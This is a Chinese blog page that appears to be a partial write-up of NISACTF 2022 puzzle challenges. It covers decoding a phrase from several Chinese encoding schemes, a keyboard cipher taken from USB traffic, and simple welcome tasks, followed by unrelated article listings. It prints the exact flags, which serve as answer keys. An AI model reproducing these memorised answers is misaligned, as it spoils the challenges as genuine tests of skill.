ovty fgh wnn 0678 3127 2347 0155 5074 MAZY AGD BMY NFA XOBV UCL A MFJI 40227 44801 36780 27620 YPTC QVIO MGBHU JYK

ovty fgh wnn     //五笔
数十亿
0678 3127 2347 0155 5074      //中文电码
合法操作者
MAZY AGD BMY NFA XOBV UCL A MFJI      //郑码
每天都体验着一种
40227 44801 36780 27620     //四角号码
有共识的
YPTC QVIO MGBHU JYK     //仓颉编码
虚拟现实

即:数十亿合法操作者每天都体验着一种有共识的虚拟现实,md5后的结果即为flag。

NSSCTF{BE29981639FCE3A4B719E4347FED9E43}

破损的flag

usb键盘流量包,用脚本得到:

UJKONJK,TFVBHYHJIPOKRDCVGRDCVGPOKQWSZTFVBHUJKOWAZXDQASEWSDRPOKXDFVIKLPNJKWSDRRFGYRDCVGUHNMKBHJMYHJI

键盘密码,围起来的字母就是要找的。

welcome to fjnu

NSSCTF{welcome_to_fjnu}

为什么我什么都看不见

NISA{Wlec0me_to_NiSa2022}

NISACTF 2022 writeup相关推荐

  1. [NISACTF 2022]checkin

    [NISACTF 2022] 题源:https://www.ctfer.vip/#/problem/2035 题目-checkin 1.源代码 2.普通传值行不通 =>看颜色:第二段注释部分颜色 ...

  2. t-star腾讯安全高校挑战赛2022 writeup

    文章目录 t-star writeup 赛题一 赛题二 赛题三 赛题四 赛题五 赛题六 参考 t-star writeup 赛题一 一个简单的验证码绕过,在包里,抓一下就可以登陆进后台了 在进入后台后 ...

  3. 祥云杯2022 writeup

    0x01 web 1.ezjava 下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞 util ,最后好像没用到 检查程序,发现apache的common−collect ...

  4. Hackergame 2022 Writeup(来自一位啥都不会的萌新)

    第一次写writeup有不足之处请见谅( 目录 签到 猫咪问答喵 家目录里的秘密 HeiLang Xcaptcha 旅行照片 2.0 线路板 量子藏宝图 企鹅拼盘 签到 众所周知,签到题是一道手速题. ...

  5. [Hack The Boo CTF 2022] writeup

    一个外国简单比赛,好多人队都答了25题,由于web不会,misc不熟,作了misc3,crypto4,pwn5,rev5不过有的找不到了,慢慢找. misc Wrong Spooky Season 附 ...

  6. [NISACTF 2022]UAF

    跟hacknote一样的做法,但是有所不同. Checksec & IDA 也是一样的保护机制,直接打开IDA看一眼 int __cdecl __noreturn main(int argc, ...

  7. HGAME 2022 Writeup

    文章目录 Level - Week1 WEB easy_auth 蛛蛛-嘿嘿?我的蛛蛛 Tetris plus Fujiwara Tofu Shop MISC 欢迎欢迎!热烈欢迎! 这个压缩包有点麻烦 ...

  8. Arab Security Cyber Wargames 2022 Qualifications corCTF 部分题解

    文章目录 ASCWQ 2022 Crypto Rsa In The Wild OSP Misc Weird FS corCTF 2022 Crypto tadpole luckyguess excha ...

  9. CTF-PWN学习-为缺少指导的同学而生

    博主也是个PWN的入门者.PWN的入门不可能是无痛的.能做到的只是减少一点初学者的痛苦.这篇博客会长期维护,也会越来越好.后期还可能会在B站出视频(博主社恐,要迈出这一步可能需要好长时间). PWN是 ...

最新文章

  1. JAVA语言教学重点_《JAVA语言》教学大纲
  2. CTFshow 命令执行 web30
  3. CCNA Discovery第二学期 (版本 4.1)
  4. python秒数转化为时间用户jianpang_Python中文转为拼音
  5. Java普通对象的内存配置
  6. 微软企业库4.1学习笔记(十)企业库的设计
  7. Python面向对象高级编程
  8. android xml 多行注释,C#中的XML多行注释 - 我做错了什么?
  9. mysql比较两个表中count_mysql两个表统计查询问题?
  10. PyQt之按钮传递鼠标按下事件点击失效
  11. 微信支付之异步通知签名错误
  12. aop实现mysql读写分离_mysql读写分离(1)---springboot+aop+tk.mybatis实现对mysql的读写分离...
  13. 基恩士KEYENCE激光打标机控制器维修ML-9110详解
  14. 如何优化微信小程序排名?
  15. 浏览量(PV)、访客数(UV)、访问次数、跳出率
  16. Kubuntu22.04中discover无法启动Software Source
  17. bzoj 1941 kd-tree求最大最小曼哈顿距离
  18. Vue3 项目遇到的问题
  19. 选择企业最合适的人才 —— 谈谈因人设岗与因事设岗
  20. java中dao是什么意思

热门文章

  1. 电商观点:网络导购走入大繁荣时代
  2. pid matlab 温度控制,温控PID算法的具体实现(一)
  3. C语言中的整型数据类型(你真的了解吗)
  4. 关于acm素数题解的思考
  5. windows环境rocketMq启动mqbroker.cmd无反应
  6. 计算机基本办公软件应用技能考试,办公软件应用操作专项职业能力考核规范
  7. python执行chromedriver闪退_python自动化测试时,chrome浏览器启动后闪退?
  8. c语言 qq窗口抖动,仿QQ窗口抖动
  9. 手机上安装Linux游戏模拟器,Linux系统上安装ePSXe 1.6.0游戏模拟器
  10. keil5环境下生成bin文件